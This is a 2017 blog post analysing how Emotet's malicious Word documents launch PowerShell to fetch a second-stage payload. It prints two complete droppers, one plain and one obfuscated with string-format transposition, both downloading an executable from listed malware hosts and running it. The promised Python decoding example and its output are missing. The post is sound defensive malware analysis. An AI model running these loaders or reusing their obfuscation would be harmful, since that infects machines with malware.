Friday, September 1, 2017

Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection.

This used to be very simple to see, for example, older observed variants produced the following powershell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} 
However, a newer variant now encodes the powershell with Base64, then uses some simple obfuscation techniques to make identification of the stage 2 links more difficult for an analyst.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA=="


echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d ${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/','sSad/,http','//arma','',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}} 
So, you could manually work through the transpositions here, however a nice technique was shown at Myonlinesecurity
If you don't have immediate access to powershell, you could also manually copy the same relevant pieces into a quick python script.
Here is an example:

The output:

No comments:

Post a Comment